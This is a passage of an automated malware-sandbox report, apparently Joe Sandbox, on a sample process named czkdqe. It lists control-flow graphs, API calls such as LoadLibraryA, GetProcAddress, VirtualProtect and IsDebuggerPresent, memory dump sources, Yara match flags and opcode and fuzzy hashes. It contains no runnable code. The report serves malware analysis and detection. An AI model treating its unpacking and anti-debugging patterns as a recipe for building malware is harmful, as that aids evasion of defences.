                                                                                    control_flow_graph 381 44d450-44d460 382 44d472-44d477 381->382 383 44d479 382->383 384 44d468-44d46d 383->384 385 44d47b 383->385 386 44d46e-44d470 384->386 387 44d480-44d482 385->387 386->382 386->383 388 44d484-44d489 387->388 389 44d48b-44d48f 387->389 388->389 390 44d491 389->390 391 44d49c-44d49f 389->391 394 44d493-44d49a 390->394 395 44d4bb-44d4c0 390->395 392 44d4a1-44d4a6 391->392 393 44d4a8-44d4aa 391->393 392->393 393->387 394->391 394->395 396 44d4c2-44d4cb 395->396 397 44d4d3-44d4d5 395->397 398 44d542-44d545 396->398 399 44d4cd-44d4d1 396->399 400 44d4d7-44d4dc 397->400 401 44d4de 397->401 402 44d54a-44d54d 398->402 399->401 400->401 403 44d4e0-44d4e3 401->403 404 44d4ac-44d4ae 401->404 407 44d54f-44d551 402->407 408 44d4e5-44d4ea 403->408 409 44d4ec 403->409 405 44d4b7-44d4b9 404->405 406 44d4b0-44d4b5 404->406 410 44d50d-44d51c 405->410 406->405 407->402 411 44d553-44d556 407->411 408->409 409->404 412 44d4ee-44d4f0 409->412 413 44d52c-44d539 410->413 414 44d51e-44d525 410->414 411->402 415 44d558-44d574 411->415 416 44d4f2-44d4f7 412->416 417 44d4f9-44d4fd 412->417 413->413 420 44d53b-44d53d 413->420 414->414 419 44d527 414->419 415->407 421 44d576 415->421 416->417 417->412 418 44d4ff 417->418 422 44d501-44d508 418->422 423 44d50a 418->423 419->386 420->386 424 44d57c-44d580 421->424 422->412 422->423 423->410 425 44d5c7-44d5f7 VirtualProtect * 2 424->425 426 44d582-44d598 LoadLibraryA 424->426 428 44d5fb-44d5ff 425->428 427 44d599-44d59e 426->427 427->424 429 44d5a0-44d5a2 427->429 428->428 430 44d601 428->430 431 44d5a4-44d5aa 429->431 432 44d5ab-44d5b8 GetProcAddress 429->432 431->432 433 44d5c1 ExitProcess 432->433 434 44d5ba-44d5bf 432->434 434->427
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(?), ref: 0044D592
                                                                                    • GetProcAddress.KERNEL32(?,00449FF9), ref: 0044D5B0
                                                                                    • ExitProcess.KERNEL32(?,00449FF9), ref: 0044D5C1
                                                                                    • VirtualProtect.KERNELBASE(00400000,00001000,00000004,?,-00000060), ref: 0044D5DE
                                                                                    • VirtualProtect.KERNELBASE(00400000,00001000), ref: 0044D5F3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.341180010.0000000000400000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_czkdqe.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                                                    • String ID:
                                                                                    • API String ID: 1996367037-0
                                                                                    • Opcode ID: 95c73a4e7170ffa8ba6ab080427cec7b3bfbced1036f2afbc60761617324cedf
                                                                                    • Instruction ID: 0ac0b7c0e5739bb1137c923d74207649c3e0b311112d00f109e80ec51aefa481
                                                                                    • Opcode Fuzzy Hash: 95c73a4e7170ffa8ba6ab080427cec7b3bfbced1036f2afbc60761617324cedf
                                                                                    • Instruction Fuzzy Hash: 32512BB1E447125BE7205DB89CC06B577A4DB52338B18073BC5E2C73C5EBBC680A8769
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 743 a67eea-a67f44 745 a67f46-a67f6e KiUserCallbackDispatcher 743->745 746 a67f92-a67fab 743->746 747 a67f77-a67f8b 745->747 748 a67f70-a67f76 745->748 747->746 748->747
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 00A67F5D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341741981.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_a60000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID: Hz
                                                                                    • API String ID: 2492992576-1816250803
                                                                                    • Opcode ID: d1b4fd38d5b478937978eef4470bc4acc50386a73b7382407685b05299147b04
                                                                                    • Instruction ID: 96fc0acc97db267d45479760d415e23279375b1da880c9d213730a6f9a46ea6c
                                                                                    • Opcode Fuzzy Hash: d1b4fd38d5b478937978eef4470bc4acc50386a73b7382407685b05299147b04
                                                                                    • Instruction Fuzzy Hash: B4210FB18087958FCB11CFA9D8447EEBFF0EB46318F14849ED485A7282C3789A05CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetEnvironmentStringsW.KERNEL32(?,00404A94), ref: 0040750A
                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,00404A94), ref: 00407549
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341180010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_czkdqe.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: EnvironmentStrings$Free
                                                                                    • String ID:
                                                                                    • API String ID: 3328510275-0
                                                                                    • Opcode ID: 687c54f429ede6c9a3700f1b62dc63b57466bf3dfbcabf1351402392e6b5ef8b
                                                                                    • Instruction ID: b1f7f09f612f60460f80359e47cfd29f29434f3d7477643bc4f3bdfe63dfc6bb
                                                                                    • Opcode Fuzzy Hash: 687c54f429ede6c9a3700f1b62dc63b57466bf3dfbcabf1351402392e6b5ef8b
                                                                                    • Instruction Fuzzy Hash: 44E09B3754D63136D112323A7C4999F1A0DCFC6679715023BF4147A2C5EE789D0200EE
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00A6962E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341741981.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_a60000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0
                                                                                    • Opcode ID: 94d244de249408b147b2896eac383463264a7126b5645f2877b6a06943ee3701
                                                                                    • Instruction ID: f90274da5e0af3620676eb14880d1d771c03a0992fcf6f1faf12ea7135dbda66
                                                                                    • Opcode Fuzzy Hash: 94d244de249408b147b2896eac383463264a7126b5645f2877b6a06943ee3701
                                                                                    • Instruction Fuzzy Hash: 55713670A00B058FD724DF2AD55575BBBF5BF88304F108A2EE48AD7A50DB74E906CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00A6FD0A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341741981.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_a60000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateWindow
                                                                                    • String ID:
                                                                                    • API String ID: 716092398-0
                                                                                    • Opcode ID: 951c7319a0cceff39f647af65b03a034e9d19b8d0ccdb6b65a0474b869c92e96
                                                                                    • Instruction ID: d7635cebe6b3d1cac1e29e657e0ec05dd926ae91d17db8826109bacc9effc32c
                                                                                    • Opcode Fuzzy Hash: 951c7319a0cceff39f647af65b03a034e9d19b8d0ccdb6b65a0474b869c92e96
                                                                                    • Instruction Fuzzy Hash: 3341B1B1D00309EFDF14CFA9D884ADEBBB5BF48314F24812AE819AB250D774A945CF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A6BD87
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341741981.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_a60000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    • Opcode ID: 932aa163e1d95a2e79beb662574a10d3f0eeaa792fee1a929bb5a591b663aab9
                                                                                    • Instruction ID: 635455467f76067a18b7c8f00d40939c3c16cfffa830a11dbc4ecd27667e1065
                                                                                    • Opcode Fuzzy Hash: 932aa163e1d95a2e79beb662574a10d3f0eeaa792fee1a929bb5a591b663aab9
                                                                                    • Instruction Fuzzy Hash: B121E4B5900208DFDB10CFAAD984ADEBFF8EB48310F14801AE958A7310D378A944CFA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00A696A9,00000800,00000000,00000000), ref: 00A698BA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341741981.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_a60000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID:
                                                                                    • API String ID: 1029625771-0
                                                                                    • Opcode ID: b3f8e1270fbe5bd8c489c71b98bbbcf6a816767a3865887d937be93e0d685306
                                                                                    • Instruction ID: d2e7b29bee5fc26e48389461b58bef0d5279adb0fcc7c3491cfa918be28552bd
                                                                                    • Opcode Fuzzy Hash: b3f8e1270fbe5bd8c489c71b98bbbcf6a816767a3865887d937be93e0d685306
                                                                                    • Instruction Fuzzy Hash: 361112B6D002099FDB10CF9AC444ADEFBF8EB48314F14852EE919B7600C3B8A945CFA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00A6962E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341741981.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_a60000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0
                                                                                    • Opcode ID: 9d0d092c3e48a6e013baf721f1269dffa992661868cc44c9bf03067614f84b78
                                                                                    • Instruction ID: 2620d58e788d1624ee417094d2dc8ea778db87f092a30ae9cfddf6f6a0278c2a
                                                                                    • Opcode Fuzzy Hash: 9d0d092c3e48a6e013baf721f1269dffa992661868cc44c9bf03067614f84b78
                                                                                    • Instruction Fuzzy Hash: 3411DFB5C006498FCB20CF9AC444ADEFBF8AB88324F14855AD829A7640D3B8A545CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • SetWindowLongW.USER32(?,?,?), ref: 00A6FE9D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341741981.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_a60000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: LongWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1378638983-0
                                                                                    • Opcode ID: e65bbd945deb32b5741f0f36c6f8bf48437e11dc85867f35a6188cea70846403
                                                                                    • Instruction ID: 5068ce2b8b262bfb85d6a039e4c933170f64781f22eab3922d288f38b82515b2
                                                                                    • Opcode Fuzzy Hash: e65bbd945deb32b5741f0f36c6f8bf48437e11dc85867f35a6188cea70846403
                                                                                    • Instruction Fuzzy Hash: 9B1115B58002489FDB10CF9AD585BDEFBF8EB48324F20855AE819A3740C378A944CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(00000008,?), ref: 004064EF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341180010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_czkdqe.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: 8f646ef87f97bce7b3fbb940021f70ed9acc1b429a1aae06431b718667ad30f8
                                                                                    • Instruction ID: 3efc618f0b7f40eca7bec11a0985368c4a4d2247eacbb5d5b70fa3bd5a8b9347
                                                                                    • Opcode Fuzzy Hash: 8f646ef87f97bce7b3fbb940021f70ed9acc1b429a1aae06431b718667ad30f8
                                                                                    • Instruction Fuzzy Hash: F6F0B43160852466DB219F22DD05B5B3758DB81770B17853BAC5ABA2C0CA78E82196AC
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(00000000,00406E77,?), ref: 00407D7A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341180010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_czkdqe.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: 8f5a00a2164cb918ef53a9def0475eb471bdd7ac5a97f66a80c2262a2e0ab220
                                                                                    • Instruction ID: 65cd16bcdc1b8bd721fcda30d9bca64849d6530a3f0c9080c4415b1d98ca3938
                                                                                    • Opcode Fuzzy Hash: 8f5a00a2164cb918ef53a9def0475eb471bdd7ac5a97f66a80c2262a2e0ab220
                                                                                    • Instruction Fuzzy Hash: 9FE0A931A0862456EA202B269C00F6B3A498F823B0B154233EC05B62D2DA7DE80182AF
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341315132.00000000005ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 005ED000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_5ed000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2920a5cb266326c41689fbd3a667e54baa76b64a650501b8b1820235268ecd57
                                                                                    • Instruction ID: 6cc24854d110c56cbd82d47935c27c90789f2c8802269d42e01b32931f61105e
                                                                                    • Opcode Fuzzy Hash: 2920a5cb266326c41689fbd3a667e54baa76b64a650501b8b1820235268ecd57
                                                                                    • Instruction Fuzzy Hash: 582103B5504280DFDB19DF14D9C0B2ABF76FB98314F3085A9E8490B206C33AD845DBB1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341340473.00000000005FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 005FD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_5fd000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1c92b271b1edfa96e8ed2a340c934c308297eafe305e293f832600c80d2e252c
                                                                                    • Instruction ID: fddf6c56d469c7a041cde18f753bbc5b81267f1906b892328b5dd1909ff3b523
                                                                                    • Opcode Fuzzy Hash: 1c92b271b1edfa96e8ed2a340c934c308297eafe305e293f832600c80d2e252c
                                                                                    • Instruction Fuzzy Hash: 2521D375504248DFDB15DF14D4C8B26BFBAFB84314F20C969EA494B246DB3ED806CA71
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341340473.00000000005FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 005FD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_5fd000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 02296aef442125fcbe3881e924df7bf7557843b827cf65c18df7d7602e9b5e37
                                                                                    • Instruction ID: 7b19a3489a90c90063030855cb09d422ed3e91ef9263d6d69a810027a3638f90
                                                                                    • Opcode Fuzzy Hash: 02296aef442125fcbe3881e924df7bf7557843b827cf65c18df7d7602e9b5e37
                                                                                    • Instruction Fuzzy Hash: B121CF79504248AFDB01CF14D9C0B26BFB6FB84314F20CA69EA494B246C33ED806DAA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341340473.00000000005FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 005FD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_5fd000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c328b105d65b3e5aa9b5765d5435aaba491f9315ac4be31e7e2ae3c7643e2e38
                                                                                    • Instruction ID: 37e2ec2106689d95e4c653035a3571a6fa4dbd353c107346799d6797c65a08e2
                                                                                    • Opcode Fuzzy Hash: c328b105d65b3e5aa9b5765d5435aaba491f9315ac4be31e7e2ae3c7643e2e38
                                                                                    • Instruction Fuzzy Hash: AC217F755093C48FCB12CF24D994715BF72EB46314F28C5EBD9898B657C33A980ACB62
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341315132.00000000005ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 005ED000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_5ed000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 982c360c003d4f1ee582f2a962539945f00b5747649ba5e4ae048a2b1d742921
                                                                                    • Instruction ID: a90af053d8525d33b180ec3f87692110e4ca6f1e0476a7406f2be945968fd66e
                                                                                    • Opcode Fuzzy Hash: 982c360c003d4f1ee582f2a962539945f00b5747649ba5e4ae048a2b1d742921
                                                                                    • Instruction Fuzzy Hash: 3911E676504280DFCF16CF10D5C4B16BF72FB84324F24C6A9D8494B616C33AD856CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341340473.00000000005FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 005FD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_5fd000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a6517b0c51532ab1228694df95b8b3b3c13daef207f256e768b7618657812813
                                                                                    • Instruction ID: deaba5083d609e7b9e86a5f16e83703744722d3aa7e2021dfd1c01b1be4636fc
                                                                                    • Opcode Fuzzy Hash: a6517b0c51532ab1228694df95b8b3b3c13daef207f256e768b7618657812813
                                                                                    • Instruction Fuzzy Hash: 85118B79904284DFDB12CF14D5C4B25BFB2FB84314F24C6AED9494B656C33AD84ACBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341315132.00000000005ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 005ED000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_5ed000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8fdb3407eb6e5b90c7d848558dfc9daccce1d6481684eaaf3dda3b67fc25ac29
                                                                                    • Instruction ID: 1073e4b2cab97f05d3251dd224143bd1bd26bf97f76690808ec3b19b9270e0ac
                                                                                    • Opcode Fuzzy Hash: 8fdb3407eb6e5b90c7d848558dfc9daccce1d6481684eaaf3dda3b67fc25ac29
                                                                                    • Instruction Fuzzy Hash: 2F01F7714083C0AAE7144A27CC88B66BFA8FF51324F1CC45AED841B242E3799805CAB1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341315132.00000000005ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 005ED000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_5ed000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0970da5a97914368744a355dcf9334dede1d3711d73f69a2d4e9f82aec75226b
                                                                                    • Instruction ID: 011400ba1f7942f42720b75079b953539de7b1cba56395e086d64be712812303
                                                                                    • Opcode Fuzzy Hash: 0970da5a97914368744a355dcf9334dede1d3711d73f69a2d4e9f82aec75226b
                                                                                    • Instruction Fuzzy Hash: 8B01006140D3C05FD7168B258C94B56BFB4EF53224F1D81DBD9C49F293D2699848C772
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00401C8F
                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00401D5B
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00401D7B
                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00401D85
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341180010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_czkdqe.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                    • String ID:
                                                                                    • API String ID: 254469556-0
                                                                                    • Opcode ID: 0b03b5c64497572952368c5c8e79ee91cfa7b3dc5a2986fe4eff801d6595a585
                                                                                    • Instruction ID: 03da4fdce737ae66b50b035683398d13283d912606226935be00c523356d6f7c
                                                                                    • Opcode Fuzzy Hash: 0b03b5c64497572952368c5c8e79ee91cfa7b3dc5a2986fe4eff801d6595a585
                                                                                    • Instruction Fuzzy Hash: F4314C75D0131C9BDB10DF61D949BCDBBB8BF08304F1041AAE44CAB290EB745A848F48
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00402091
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341180010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_czkdqe.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FeaturePresentProcessor
                                                                                    • String ID:
                                                                                    • API String ID: 2325560087-0
                                                                                    • Opcode ID: aff1236686487d6b46e9e8e0c19cb1fcae2ccfbf7df8aebfde6a1c09ffe72525
                                                                                    • Instruction ID: f4e6d6712146c31b67f0ac610b88ab6e8419e367a2555085ce8b4d0adaa77c0e
                                                                                    • Opcode Fuzzy Hash: aff1236686487d6b46e9e8e0c19cb1fcae2ccfbf7df8aebfde6a1c09ffe72525
                                                                                    • Instruction Fuzzy Hash: F6515AB1911A15CBDB14CF94DAD97EABBF1FB88314F14857AC445EB3A0D3B89900CB94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 00403A0A
                                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 00403B18
                                                                                    • _UnwindNestedFrames.LIBCMT ref: 00403C6A
                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 00403C85
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341180010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_czkdqe.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                    • String ID: csm$csm$csm
                                                                                    • API String ID: 2751267872-393685449
                                                                                    • Opcode ID: d2805ed157ee1a0de980ebf95ce551697e3ac2d298d2a0e6c6e08f639c5bac21
                                                                                    • Instruction ID: eb951dfd93c377336a0bd22ac6a7177933b6abc1ee62d3cbfcc6e570eabf6f1d
                                                                                    • Opcode Fuzzy Hash: d2805ed157ee1a0de980ebf95ce551697e3ac2d298d2a0e6c6e08f639c5bac21
                                                                                    • Instruction Fuzzy Hash: 00B17A75900209DFCF15DFA5C9819AEBBB8BF04316F14416BE8017B292C379EA51CF99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00402347
                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0040234F
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 004023D8
                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00402403
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00402458
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341180010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_czkdqe.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                    • String ID: <&@$csm
                                                                                    • API String ID: 1170836740-4289465445
                                                                                    • Opcode ID: 62bc818260f3d61d15a3a2816a247d7c989dff70b0980e5c6bc77aebcd7fc6d4
                                                                                    • Instruction ID: e86dbd8585806dd5d23d3718c6f18d027200fadb66ce12341b0a8af8e769dc64
                                                                                    • Opcode Fuzzy Hash: 62bc818260f3d61d15a3a2816a247d7c989dff70b0980e5c6bc77aebcd7fc6d4
                                                                                    • Instruction Fuzzy Hash: EF41D734A002199BCF10DF69C988A9EBBB0AF44314F14807AED14BB3D2D7B9DA55CB95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,DA6CC159,?,004083E2,00000002,00000000,00000000), ref: 00408394
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341180010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_czkdqe.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FreeLibrary
                                                                                    • String ID: api-ms-$ext-ms-
                                                                                    • API String ID: 3664257935-537541572
                                                                                    • Opcode ID: c9283d596dd430a65ff98e794139049b5b5b47e480c88dd665e719789acae378
                                                                                    • Instruction ID: 573f1ada4d3828c880b6c39e4f7b2ce1dfde6baafd70aff868d57e190d54574b
                                                                                    • Opcode Fuzzy Hash: c9283d596dd430a65ff98e794139049b5b5b47e480c88dd665e719789acae378
                                                                                    • Instruction Fuzzy Hash: F1212B32A00221EBC7219B229D40A9F3368EB81B60F25053AED55B73D0DF79ED01CADD
                                                                                    Uniqueness

